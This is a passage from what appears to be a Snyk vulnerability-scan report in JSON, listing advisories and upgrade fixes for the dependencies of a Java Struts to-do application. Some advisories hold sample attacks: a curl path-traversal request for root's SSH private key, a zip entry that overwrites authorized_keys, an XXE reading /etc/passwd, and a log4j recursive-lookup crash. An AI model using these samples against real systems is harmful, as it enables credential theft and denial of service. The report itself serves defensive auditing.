It is an integral part of popular protocols like _Remote Method Invocation (RMI)_, _Java Management Extension (JMX)_, _Java Messaging System (JMS)_, _Action Message Format (AMF)_, _Java Server Faces (JSF) ViewState_, etc.\r\n\r\n \r\n\r\n_Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)), is when the application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, letting the attacker to control the state or the flow of the execution.\r\n\r\n \r\n\r\nJava deserialization issues have been known for years. However, interest in the issue intensified greatly in 2015, when classes that could be abused to achieve remote code execution were found in a [popular library (Apache Commons Collection)](https://snyk.io/vuln/SNYK-JAVA-COMMONSCOLLECTIONS-30078). These classes were used in zero-days affecting IBM WebSphere, Oracle WebLogic and many other products.\r\n\r\n \r\n\r\nAn attacker just needs to identify a piece of software that has both a vulnerable class on its path, and performs deserialization on untrusted data. Then all they need to do is send the payload into the deserializer, getting the command executed.\r\n\r\n \r\n\r\n> Developers put too much trust in Java Object Serialization. Some even de-serialize objects pre-authentication. When deserializing an Object in Java you typically cast it to an expected type, and therefore Java's strict type system will ensure you only get valid object trees. Unfortunately, by the time the type checking happens, platform code has already created and executed significant logic. So, before the final type is checked a lot of code is executed from the readObject() methods of various objects, all of which is out of the developer's control. 
By combining the readObject() methods of various classes which are available on the classpath of the vulnerable application an attacker can execute functions (including calling Runtime.exec() to execute local OS commands).\r\n\r\n- Apache Blog\r\n\r\n \r\n\r\nThe vulnerability, also know as _Mad Gadget_\r\n\r\n> Mad Gadget is one of the most pernicious vulnerabilities we’ve seen. By merely existing on the Java classpath, seven “gadget” classes in Apache Commons Collections (versions 3.0, 3.1, 3.2, 3.2.1, and 4.0) make object deserialization for the entire JVM process Turing complete with an exec function. Since many business applications use object deserialization to send messages across the network, it would be like hiring a bank teller who was trained to hand over all the money in the vault if asked to do so politely, and then entrusting that teller with the key. The only thing that would keep a bank safe in such a circumstance is that most people wouldn’t consider asking such a question.\r\n\r\n- Google\n\n\n# Remediation\n\nUpgrade `commons-collections:commons-collections` to version 3.2.2 or higher.\n\n\n# References\n\n- [GitHub Commit](https://github.com/apache/commons-collections/commit/5ec476b0b756852db865b2e442180f091f8209ee)\n\n- [GitHub PR](https://github.com/apache/commons-collections/pull/18)\n\n- [Jira Ticket](https://issues.apache.org/jira/browse/COLLECTIONS-580)\n" + }, + "properties": { + "tags": [ + "security", + "CWE-502", + "maven" + ], + "cvssv3_baseScore": 5.6, + "security-severity": "5.6" + } + }, + { + "id": "SNYK-JAVA-COMMONSFILEUPLOAD-30082", + "shortDescription": { + "text": "High severity - Denial of Service (DoS) vulnerability in commons-fileupload:commons-fileupload" + }, + "fullDescription": { + "text": "(CVE-2016-3092) commons-fileupload:commons-fileupload@1.3.1" + }, + "help": { + "text": "", + "markdown": "* Package Manager: maven\n* Vulnerable module: commons-fileupload:commons-fileupload\n* Introduced through: 
io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT, org.apache.struts:struts2-core@2.3.20 and others\n### Detailed paths\n* _Introduced through_: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT › org.apache.struts:struts2-core@2.3.20 › commons-fileupload:commons-fileupload@1.3.1\n# Overview\n[commons-fileupload:commons-fileupload](https://mvnrepository.com/artifact/commons-fileupload/commons-fileupload) is a component that provides a simple yet flexible means of adding support for multipart file upload functionality to servlets and web applications.\n\nAffected versions of this package are vulnerable to Denial of Service (DoS). It allows remote attackers to cause a denial of service (CPU consumption) via a long boundary string.\n\n# Details\n\nDenial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.\n\nUnlike other vulnerabilities, DoS attacks usually do not aim at breaching security. Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.\n\nOne popular Denial of Service vulnerability is DDoS (a Distributed Denial of Service), an attack that attempts to clog network pipes to the system by generating a large volume of traffic from many machines.\n\nWhen it comes to open source libraries, DoS vulnerabilities allow attackers to trigger such a crash or crippling of the service by using a flaw either in the application code or from the use of open source libraries.\n\nTwo common types of DoS vulnerabilities:\n\n* High CPU/Memory Consumption- An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. For example, [commons-fileupload:commons-fileupload](SNYK-JAVA-COMMONSFILEUPLOAD-30082).\n\n* Crash - An attacker sending crafted requests that could cause the system to crash. 
For Example, [npm `ws` package](https://snyk.io/vuln/npm:ws:20171108)\n\n# Remediation\nUpgrade `commons-fileupload:commons-fileupload` to version 1.3.2 or higher.\n# References\n- [Apache Mail Archive](http://mail-archives.us.apache.org/mod_mbox/www-announce/201606.mbox/%3C6223ece6-2b41-ef4f-22f9-d3481e492832@apache.org%3E)\n- [Apache-SVN](http://svn.apache.org/viewvc/commons/proper/fileupload/trunk/RELEASE-NOTES.txt?r1=1745717&r2=1749637&diff_format=h)\n- [CVE Details](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3092)\n- [Github ChangeLog](https://github.com/apache/commons-fileupload/blob/b1498c9877d751f8bc4635a6f252ebdfcba28518/src/changes/changes.xml#L84)\n- [GitHub Commit](https://github.com/apache/tomcat80/commit/d752a415a875e888d8c8d0988dfbde95c2c6fb1d)\n- [GitHub Commit](https://github.com/apache/tomcat/commit/2c3553f3681baf775c50bb0b49ea61cb44ea914f)\n- [GitHub Commit](https://github.com/apache/tomcat/commit/8999f8243197a5f8297d0cb1a0d86ed175678a77)\n- [RedHat Bugzilla Bug](https://bugzilla.redhat.com/show_bug.cgi?id=1349475)\n" + }, + "properties": { + "tags": [ + "security", + "CWE-20", + "maven" + ], + "cvssv3_baseScore": 7.5, + "security-severity": "7.5" + } + }, + { + "id": "SNYK-JAVA-COMMONSFILEUPLOAD-31540", + "shortDescription": { + "text": "Medium severity - Information Exposure vulnerability in commons-fileupload:commons-fileupload" + }, + "fullDescription": { + "text": "commons-fileupload:commons-fileupload@1.3.1" + }, + "help": { + "text": "", + "markdown": "* Package Manager: maven\n* Vulnerable module: commons-fileupload:commons-fileupload\n* Introduced through: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT, org.apache.struts:struts2-core@2.3.20 and others\n### Detailed paths\n* _Introduced through_: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT › org.apache.struts:struts2-core@2.3.20 › commons-fileupload:commons-fileupload@1.3.1\n# 
Overview\r\n[`commons-fileupload:commons-fileupload`](https://commons.apache.org/proper/commons-fileupload/) provides a simple yet flexible means of adding support for multipart file upload functionality to servlets and web applications.\r\n\r\nAffected versions of the package are vulnerable to Information Disclosure because the `InputStream` is not closed on exception.\r\n\r\n# Remediation\r\nUpgrade `commons-fileupload` to version 1.3.2 or higher.\r\n\r\n# References\r\n- [Github ChangeLog](https://github.com/apache/commons-fileupload/blob/master/src/changes/changes.xml#L56)\r\n- [Github Commit](https://github.com/apache/commons-fileupload/commit/5b4881d7f75f439326f54fa554a9ca7de6d60814)" + }, + "properties": { + "tags": [ + "security", + "CWE-200", + "maven" + ], + "cvssv3_baseScore": 6.5, + "security-severity": "6.5" + } + }, + { + "id": "SNYK-JAVA-COMMONSFILEUPLOAD-3326457", + "shortDescription": { + "text": "Medium severity - Denial of Service (DoS) vulnerability in commons-fileupload:commons-fileupload" + }, + "fullDescription": { + "text": "(CVE-2023-24998) commons-fileupload:commons-fileupload@1.3.1" + }, + "help": { + "text": "", + "markdown": "* Package Manager: maven\n* Vulnerable module: commons-fileupload:commons-fileupload\n* Introduced through: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT, org.apache.struts:struts2-core@2.3.20 and others\n### Detailed paths\n* _Introduced through_: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT › org.apache.struts:struts2-core@2.3.20 › commons-fileupload:commons-fileupload@1.3.1\n# Overview\n[commons-fileupload:commons-fileupload](https://mvnrepository.com/artifact/commons-fileupload/commons-fileupload) is a component that provides a simple yet flexible means of adding support for multipart file upload functionality to servlets and web applications.\n\nAffected versions of this package are vulnerable to Denial of Service (DoS) when an attacker sends a large number of request parts in a series of uploads or a 
single multipart upload.\r\n\r\n**NOTE:** After upgrading to the fixed version, the `setFileCountMax()` must be explicitly set to avoid this vulnerability.\n\n# Details\n\nDenial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.\n\nUnlike other vulnerabilities, DoS attacks usually do not aim at breaching security. Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.\n\nOne popular Denial of Service vulnerability is DDoS (a Distributed Denial of Service), an attack that attempts to clog network pipes to the system by generating a large volume of traffic from many machines.\n\nWhen it comes to open source libraries, DoS vulnerabilities allow attackers to trigger such a crash or crippling of the service by using a flaw either in the application code or from the use of open source libraries.\n\nTwo common types of DoS vulnerabilities:\n\n* High CPU/Memory Consumption- An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. For example, [commons-fileupload:commons-fileupload](SNYK-JAVA-COMMONSFILEUPLOAD-30082).\n\n* Crash - An attacker sending crafted requests that could cause the system to crash. 
For Example, [npm `ws` package](https://snyk.io/vuln/npm:ws:20171108)\n\n# Remediation\nUpgrade `commons-fileupload:commons-fileupload` to version 1.5 or higher.\n# References\n- [Apache Mailing List](https://lists.apache.org/thread/4xl4l09mhwg4vgsk7dxqogcjrobrrdoy)\n- [GitHub Commit](https://github.com/apache/commons-fileupload/commit/0a306f75949f2e9f5f92c400cad39d20117a2eb0)\n- [GitHub Commit](https://github.com/apache/commons-fileupload/commit/e20c04990f7420ca917e96a84cec58b13a1b3d17)\n- [GitHub Commit (Tomcat)](https://github.com/apache/tomcat/commit/063e2e81ede50c287f737cc8e2915ce7217e886e)\n" + }, + "properties": { + "tags": [ + "security", + "CWE-400", + "maven" + ], + "cvssv3_baseScore": 6.5, + "security-severity": "6.5" + } + }, + { + "id": "SNYK-JAVA-COMMONSIO-1277109", + "shortDescription": { + "text": "Medium severity - Directory Traversal vulnerability in commons-io:commons-io" + }, + "fullDescription": { + "text": "(CVE-2021-29425) commons-io:commons-io@2.2" + }, + "help": { + "text": "", + "markdown": "* Package Manager: maven\n* Vulnerable module: commons-io:commons-io\n* Introduced through: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT, org.apache.struts:struts2-core@2.3.20 and others\n### Detailed paths\n* _Introduced through_: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT › org.apache.struts:struts2-core@2.3.20 › commons-io:commons-io@2.2\n# Overview\n[commons-io:commons-io](https://search.maven.org/artifact/commons-io/commons-io) is a The Apache Commons IO library contains utility classes, stream implementations, file filters, file comparators, endian transformation classes, and much more.\n\nAffected versions of this package are vulnerable to Directory Traversal via calling the method FileNameUtils.normalize using an improper string like `//../foo` or `\\\\..\\foo`, which may allow access to files in the parent directory.\n\n# Details\n\nA Directory Traversal attack (also known as path traversal) aims to access files and directories 
that are stored outside the intended folder. By manipulating files with \"dot-dot-slash (../)\" sequences and its variations, or by using absolute file paths, it may be possible to access arbitrary files and directories stored on file system, including application source code, configuration, and other critical system files.\n\nDirectory Traversal vulnerabilities can be generally divided into two types:\n\n- **Information Disclosure**: Allows the attacker to gain information about the folder structure or read the contents of sensitive files on the system.\n\n`st` is a module for serving static files on web pages, and contains a [vulnerability of this type](https://snyk.io/vuln/npm:st:20140206). In our example, we will serve files from the `public` route.\n\nIf an attacker requests the following URL from our server, it will in turn leak the sensitive private key of the root user.\n\n```\ncurl http://localhost:8080/public/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/root/.ssh/id_rsa\n```\n**Note** `%2e` is the URL encoded version of `.` (dot).\n\n- **Writing arbitrary files**: Allows the attacker to create or replace existing files. This type of vulnerability is also known as `Zip-Slip`. \n\nOne way to achieve this is by using a malicious `zip` archive that holds path traversal filenames. When each filename in the zip archive gets concatenated to the target extraction folder, without validation, the final path ends up outside of the target folder. If an executable or a configuration file is overwritten with a file containing malicious code, the problem can turn into an arbitrary code execution issue quite easily.\n\nThe following is an example of a `zip` archive with one benign file and one malicious file. Extracting the malicious file will result in traversing out of the target folder, ending up in `/root/.ssh/` overwriting the `authorized_keys` file:\n\n```\n2018-04-15 22:04:29 ..... 19 19 good.txt\n2018-04-15 22:04:42 ..... 
20 20 ../../../../../../root/.ssh/authorized_keys\n```\n\n# Remediation\nUpgrade `commons-io:commons-io` to version 2.7 or higher.\n# References\n- [GitHub Commit](https://github.com/apache/commons-io/commit/fe7543eee5cd4b2f9e78aa44c31031b68eba204d)\n- [Jira Issue](https://issues.apache.org/jira/browse/IO-556)\n- [PoC](https://github.com/AlAIAL90/CVE-2021-29425)\n" + }, + "properties": { + "tags": [ + "security", + "CWE-20", + "CWE-22", + "maven" + ], + "cvssv3_baseScore": 5.3, + "security-severity": "5.3" + } + }, + { + "id": "SNYK-JAVA-DOM4J-174153", + "shortDescription": { + "text": "High severity - XML External Entity (XXE) Injection vulnerability in dom4j:dom4j" + }, + "fullDescription": { + "text": "(CVE-2018-1000632) dom4j:dom4j@1.6.1" + }, + "help": { + "text": "", + "markdown": "* Package Manager: maven\n* Vulnerable module: dom4j:dom4j\n* Introduced through: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT, io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT and others\n### Detailed paths\n* _Introduced through_: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT › io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT › io.github.snyk:todolist-core@0.0.1-SNAPSHOT › org.hibernate:hibernate-core@4.3.7.Final › dom4j:dom4j@1.6.1\n# Overview\n[dom4j:dom4j](https://github.com/dom4j/dom4j) is a flexible XML framework for Java. *Note*: this artifact has been deprecated for `org.dom4j:dom4j`.\n\nAffected versions of this package are vulnerable to XML External Entity (XXE) Injection due to improper validation of the `QName` inputs.\n\n# Details\nXXE Injection is a type of attack against an application that parses XML input.\nXML is a markup language that defines a set of rules for encoding documents in a format that is both human-readable and machine-readable. By default, many XML processors allow specification of an external entity, a URI that is dereferenced and evaluated during XML processing. 
When an XML document is being parsed, the parser can make a request and include the content at the specified URI inside of the XML document.\n\nAttacks can include disclosing local files, which may contain sensitive data such as passwords or private user data, using file: schemes or relative paths in the system identifier.\n\nFor example, below is a sample XML document, containing an XML element- username.\n\n```\n\n\n John\n\n```\n\nAn external XML entity - `xxe`, is defined using a system identifier and present within a DOCTYPE header. These entities can access local or remote content. For example the below code contains an external XML entity that would fetch the content of `/etc/passwd` and display it to the user rendered by `username`.\n\n```\n\n\n]>\n &xxe;\n\n```\n\nOther XXE Injection attacks can access local resources that may not stop returning data, possibly impacting application availability and leading to Denial of Service.\n\n# Remediation\nThere is no fixed version for `dom4j:dom4j`.\n\n# References\n- [GitHub Commit](https://github.com/dom4j/dom4j/commit/e598eb43d418744c4dbf62f647dd2381c9ce9387)\n- [GitHub Issue](https://github.com/dom4j/dom4j/issues/48)\n- [POC: Ihacktoprotect Blog](https://ihacktoprotect.com/post/dom4j-xml-injection/)\n" + }, + "properties": { + "tags": [ + "security", + "CWE-611", + "maven" + ], + "cvssv3_baseScore": 7.5, + "security-severity": "7.5" + } + }, + { + "id": "SNYK-JAVA-DOM4J-2812975", + "shortDescription": { + "text": "High severity - XML External Entity (XXE) Injection vulnerability in dom4j:dom4j" + }, + "fullDescription": { + "text": "(CVE-2020-10683) dom4j:dom4j@1.6.1" + }, + "help": { + "text": "", + "markdown": "* Package Manager: maven\n* Vulnerable module: dom4j:dom4j\n* Introduced through: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT, io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT and others\n### Detailed paths\n* _Introduced through_: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT › 
io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT › io.github.snyk:todolist-core@0.0.1-SNAPSHOT › org.hibernate:hibernate-core@4.3.7.Final › dom4j:dom4j@1.6.1\n# Overview\n[dom4j:dom4j](https://github.com/dom4j/dom4j) is a flexible XML framework for Java. *Note*: this artifact has been deprecated for `org.dom4j:dom4j`.\n\nAffected versions of this package are vulnerable to XML External Entity (XXE) Injection. By using the default `SaxReader()` provided by Dom4J, external DTDs and External Entities are allowed, resulting in a possible XXE.\n\n# Details\nXXE Injection is a type of attack against an application that parses XML input.\nXML is a markup language that defines a set of rules for encoding documents in a format that is both human-readable and machine-readable. By default, many XML processors allow specification of an external entity, a URI that is dereferenced and evaluated during XML processing. When an XML document is being parsed, the parser can make a request and include the content at the specified URI inside of the XML document.\n\nAttacks can include disclosing local files, which may contain sensitive data such as passwords or private user data, using file: schemes or relative paths in the system identifier.\n\nFor example, below is a sample XML document, containing an XML element- username.\n\n```\n\n\n John\n\n```\n\nAn external XML entity - `xxe`, is defined using a system identifier and present within a DOCTYPE header. These entities can access local or remote content. 
For example the below code contains an external XML entity that would fetch the content of `/etc/passwd` and display it to the user rendered by `username`.\n\n```\n\n\n]>\n &xxe;\n\n```\n\nOther XXE Injection attacks can access local resources that may not stop returning data, possibly impacting application availability and leading to Denial of Service.\n\n# Remediation\nThere is no fixed version for `dom4j:dom4j`.\n\n# References\n- [GitHub Commit](https://github.com/dom4j/dom4j/commit/a822852)\n- [RedHat Bugzilla Bug](https://bugzilla.redhat.com/show_bug.cgi?id=1694235)\n" + }, + "properties": { + "tags": [ + "security", + "CWE-611", + "maven" + ], + "cvssv3_baseScore": 7.4, + "security-severity": "7.4" + } + }, + { + "id": "SNYK-JAVA-JAVAXSERVLET-30449", + "shortDescription": { + "text": "High severity - XML External Entity (XXE) Injection vulnerability in javax.servlet:jstl" + }, + "fullDescription": { + "text": "(CVE-2015-0254) javax.servlet:jstl@1.2" + }, + "help": { + "text": "", + "markdown": "* Package Manager: maven\n* Vulnerable module: javax.servlet:jstl\n* Introduced through: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT, io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT and others\n### Detailed paths\n* _Introduced through_: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT › io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT › javax.servlet:jstl@1.2\n# Overview\n[javax.servlet:jstl](https://mvnrepository.com/artifact/javax.servlet/jstl) is a collection of useful JSP tags which encapsulates the core functionality common to many JSP applications.\n\nAffected versions of this package are vulnerable to XML External Entity (XXE) Injection. 
Apache Standard Taglibs before 1.2.3 allows remote attackers to execute arbitrary code or conduct external XML entity (XXE) attacks via a crafted XSLT extension in a `` or `` JSTL XML tag.\n\n# Details\nXXE Injection is a type of attack against an application that parses XML input.\nXML is a markup language that defines a set of rules for encoding documents in a format that is both human-readable and machine-readable. By default, many XML processors allow specification of an external entity, a URI that is dereferenced and evaluated during XML processing. When an XML document is being parsed, the parser can make a request and include the content at the specified URI inside of the XML document.\n\nAttacks can include disclosing local files, which may contain sensitive data such as passwords or private user data, using file: schemes or relative paths in the system identifier.\n\nFor example, below is a sample XML document, containing an XML element- username.\n\n```\n\n\n John\n\n```\n\nAn external XML entity - `xxe`, is defined using a system identifier and present within a DOCTYPE header. These entities can access local or remote content. 
For example the below code contains an external XML entity that would fetch the content of `/etc/passwd` and display it to the user rendered by `username`.\n\n```\n\n\n]>\n &xxe;\n\n```\n\nOther XXE Injection attacks can access local resources that may not stop returning data, possibly impacting application availability and leading to Denial of Service.\n\n# Remediation\nThere is no fixed version for `javax.servlet:jstl`.\n\n# References\n- [Apache Mail Archive](http://mail-archives.us.apache.org/mod_mbox/www-announce/201502.mbox/%3C82207A16-6348-4DEE-877E-F7B87292576A@apache.org%3E)\n- [NVD](https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-0254)\n- [RedHat CVE Database](https://access.redhat.com/security/cve/CVE-2015-0254)\n" + }, + "properties": { + "tags": [ + "security", + "CWE-94", + "maven" + ], + "cvssv3_baseScore": 7.3, + "security-severity": "7.3" + } + }, + { + "id": "SNYK-JAVA-OGNL-30474", + "shortDescription": { + "text": "Medium severity - Denial of Service (DoS) vulnerability in ognl:ognl" + }, + "fullDescription": { + "text": "(CVE-2016-3093) ognl:ognl@3.0.6" + }, + "help": { + "text": "", + "markdown": "* Package Manager: maven\n* Vulnerable module: ognl:ognl\n* Introduced through: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT, org.apache.struts:struts2-core@2.3.20 and others\n### Detailed paths\n* _Introduced through_: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT › org.apache.struts:struts2-core@2.3.20 › ognl:ognl@3.0.6\n# Overview\n[`ognl:ognl`](http://search.maven.org/#search%7Cga%7C1%7Ca%3A%22ognl%22) is a simple Expression Language (EL) for Java.\n\nAffected versions of this package are vulnerable to Denial of Service (DoS) attacks.\nApache Struts 2.0.0 through 2.3.24.1 does not properly cache method references when used with OGNL before 3.0.12, which allows remote attackers to cause a denial of service (block access to a web site) via unspecified vectors.\n\n# Details\nDenial of Service (DoS) describes a family of attacks, 
all aimed at making a system inaccessible to its intended and legitimate users.\r\n\r\nUnlike other vulnerabilities, DoS attacks usually do not aim at breaching security. Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.\r\n\r\nOne popular Denial of Service vulnerability is DDoS (a Distributed Denial of Service), an attack that attempts to clog network pipes to the system by generating a large volume of traffic from many machines.\r\n\r\nWhen it comes to open source libraries, DoS vulnerabilities allow attackers to trigger such a crash or crippling of the service by using a flaw either in the application code or from the use of open source libraries.\r\n\r\nTwo common types of DoS vulnerabilities:\r\n\r\n* High CPU/Memory Consumption- An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. For example, [commons-fileupload:commons-fileupload](SNYK-JAVA-COMMONSFILEUPLOAD-30082).\r\n\r\n* Crash - An attacker sending crafted requests that could cause the system to crash. 
For Example, [npm `ws` package](npm:ws:20171108)\n\n# Remediation\nUpgrade `ognl:ognl` to version 3.0.12 or higher.\n\n# References\n- [NVD](https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-3093)\n- [GitHub Commit](https://github.com/jkuhnert/ognl/commit/ae43073fbf38db8371ff4f8bf2a966ee3b5f7e92)\n" + }, + "properties": { + "tags": [ + "security", + "CWE-20", + "maven" + ], + "cvssv3_baseScore": 5.3, + "security-severity": "5.3" + } + }, + { + "id": "SNYK-JAVA-ORGAPACHELOGGINGLOG4J-2321524", + "shortDescription": { + "text": "High severity - Denial of Service (DoS) vulnerability in org.apache.logging.log4j:log4j-core" + }, + "fullDescription": { + "text": "(CVE-2021-45105) org.apache.logging.log4j:log4j-core@2.7" + }, + "help": { + "text": "", + "markdown": "* Package Manager: maven\n* Vulnerable module: org.apache.logging.log4j:log4j-core\n* Introduced through: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT and org.apache.logging.log4j:log4j-core@2.7\n### Detailed paths\n* _Introduced through_: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT › org.apache.logging.log4j:log4j-core@2.7\n# Overview\n[org.apache.logging.log4j:log4j-core](http://logging.apache.org/log4j/1.2/) is a logging library for Java.\n\nAffected versions of this package are vulnerable to Denial of Service (DoS). Does not protect against uncontrolled recursion from self-referential lookups. \r\n\r\nWhen the logging configuration uses a non-default Pattern Layout with a Context Lookup (for example, `$${ctx:loginId}`), attackers with control over Thread Context Map (MDC) input data can craft malicious input data that contains a recursive lookup, resulting in a `StackOverflowError` that will terminate the process.\r\n\r\n## PoC\r\n\r\nIn `log4j.properties`:\r\n```java\r\nappender.console.type = Console\r\nappender.console.name = console\r\nappender.console.layout.type = PatternLayout\r\nappender.console.layout.pattern = !${ctx:test}! 
%m%n\r\nrootLogger.level = ALL\r\nrootLogger.appenderRef.file.ref = console\r\n```\r\n\r\nIn `Main.java`:\r\n```java\r\nThreadContext.put(\"test\", \"${::-${ctx:test}}\");\r\nlogger.error(\"boom\"); // Will not be logged\r\n```\n\n# Details\n\nDenial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.\n\nUnlike other vulnerabilities, DoS attacks usually do not aim at breaching security. Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.\n\nOne popular Denial of Service vulnerability is DDoS (a Distributed Denial of Service), an attack that attempts to clog network pipes to the system by generating a large volume of traffic from many machines.\n\nWhen it comes to open source libraries, DoS vulnerabilities allow attackers to trigger such a crash or crippling of the service by using a flaw either in the application code or from the use of open source libraries.\n\nTwo common types of DoS vulnerabilities:\n\n* High CPU/Memory Consumption- An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. For example, [commons-fileupload:commons-fileupload](SNYK-JAVA-COMMONSFILEUPLOAD-30082).\n\n* Crash - An attacker sending crafted requests that could cause the system to crash. 
For Example, [npm `ws` package](https://snyk.io/vuln/npm:ws:20171108)\n\n# Remediation\nUpgrade `org.apache.logging.log4j:log4j-core` to version 2.3.1, 2.12.3, 2.17.0 or higher.\n# References\n- [Apache Security](https://logging.apache.org/log4j/2.x/security.html)\n- [JIRA Issue](https://issues.apache.org/jira/browse/LOG4J2-3230)\n" + }, + "properties": { + "tags": [ + "security", + "CWE-400", + "maven" + ], + "cvssv3_baseScore": 7.5, + "security-severity": "7.5" + } + }, + { + "id": "SNYK-JAVA-ORGAPACHELOGGINGLOG4J-2327339", + "shortDescription": { + "text": "Medium severity - Arbitrary Code Execution vulnerability in org.apache.logging.log4j:log4j-core" + }, + "fullDescription": { + "text": "(CVE-2021-44832) org.apache.logging.log4j:log4j-core@2.7" + }, + "help": { + "text": "", + "markdown": "* Package Manager: maven\n* Vulnerable module: org.apache.logging.log4j:log4j-core\n* Introduced through: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT and org.apache.logging.log4j:log4j-core@2.7\n### Detailed paths\n* _Introduced through_: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT › org.apache.logging.log4j:log4j-core@2.7\n# Overview\n[org.apache.logging.log4j:log4j-core](http://logging.apache.org/log4j/1.2/) is a logging library for Java.\n\nAffected versions of this package are vulnerable to Arbitrary Code Execution.
**Note:** Even though this vulnerability appears to be related to the [log4Shell vulnerability](https://security.snyk.io/vuln/SNYK-JAVA-ORGAPACHELOGGINGLOG4J-2314720), this vulnerability requires an attacker to have access to modify configurations to be exploitable, which is rarely possible.\r\n\r\nAn attacker with access to modification of logging configuration is able to configure `JDBCAppender` with a data source referencing a JNDI URI - which can execute malicious code.\r\n\r\nIn the fixed versions, `JDBCAppender` is using `JndiManager` and disables JNDI lookups by default (via `log4j2.enableJndiJdbc=false`).\r\n\r\n# Alternative Remediation\r\nIf you have reason to believe your application may be vulnerable and upgrading is not an option, you can either:\r\n\r\n* Disable/remove `JDBCAppender`\r\n* If `JDBCAppender` is used, make sure that it is not configured to use any protocol other than Java\n# Remediation\nUpgrade `org.apache.logging.log4j:log4j-core` to version 2.3.2, 2.12.4, 2.17.1 or higher.\n# References\n- [Apache Security Page](https://logging.apache.org/log4j/2.x/security.html)\n- [GitHub Commit](https://github.com/apache/logging-log4j2/commit/05db5f9527254632b59aed2a1d78a32c5ab74f16)\n- [Jira Issue](https://issues.apache.org/jira/browse/LOG4J2-3293)\n- [Openwall Mail](https://www.openwall.com/lists/oss-security/2021/12/28/1)\n" + }, + "properties": { + "tags": [ + "security", + "CWE-94", + "maven" + ], + "cvssv3_baseScore": 6.6, + "security-severity": "6.6" + } + }, + { + "id": "SNYK-JAVA-ORGAPACHELOGGINGLOG4J-567761", + "shortDescription": { + "text": "Low severity - Man-in-the-Middle (MitM) vulnerability in org.apache.logging.log4j:log4j-core" + }, + "fullDescription": { + "text": "(CVE-2020-9488) org.apache.logging.log4j:log4j-core@2.7" + }, + "help": { + "text": "", + "markdown": "* Package Manager: maven\n* Vulnerable module: org.apache.logging.log4j:log4j-core\n* Introduced through: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT and 
org.apache.logging.log4j:log4j-core@2.7\n### Detailed paths\n* _Introduced through_: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT › org.apache.logging.log4j:log4j-core@2.7\n# Overview\n[org.apache.logging.log4j:log4j-core](http://logging.apache.org/log4j/1.2/) is a logging library for Java.\n\nAffected versions of this package are vulnerable to Man-in-the-Middle (MitM). Improper validation of certificate with host mismatch in Apache Log4j SMTP appender. This could allow an SMTPS connection to be intercepted by a man-in-the-middle attack which could leak any log messages sent through that appender.\n# Remediation\nUpgrade `org.apache.logging.log4j:log4j-core` to version 2.13.2 or higher.\n# References\n- [Atlassian Patch](https://confluence.atlassian.com/jirakb/list-of-security-vulnerabilities-addressed-in-atlassian-log4j1-1141965553.html)\n- [GitHub Commit](https://github.com/apache/logging-log4j2/commit/6851b5083ef9610bae320bf07e1f24d2aa08851b)\n- [Jira Issue](https://issues.apache.org/jira/browse/LOG4J2-2819)\n- [Reload4j Fix Commit](https://github.com/qos-ch/reload4j/commit/90bc7826c206c256ee9ec6b51318cc1865cc19e9)\n" + }, + "properties": { + "tags": [ + "security", + "CWE-297", + "maven" + ], + "cvssv3_baseScore": 3.7, + "security-severity": "3.7" + } + }, + { + "id": "SNYK-JAVA-ORGAPACHESTRUTS-2635340", + "shortDescription": { + "text": "High severity - Remote Code Execution (RCE) vulnerability in org.apache.struts:struts2-core" + }, + "fullDescription": { + "text": "(CVE-2021-31805) org.apache.struts:struts2-core@2.3.20" + }, + "help": { + "text": "", + "markdown": "* Package Manager: maven\n* Vulnerable module: org.apache.struts:struts2-core\n* Introduced through: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT and org.apache.struts:struts2-core@2.3.20\n### Detailed paths\n* _Introduced through_: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT › org.apache.struts:struts2-core@2.3.20\n# 
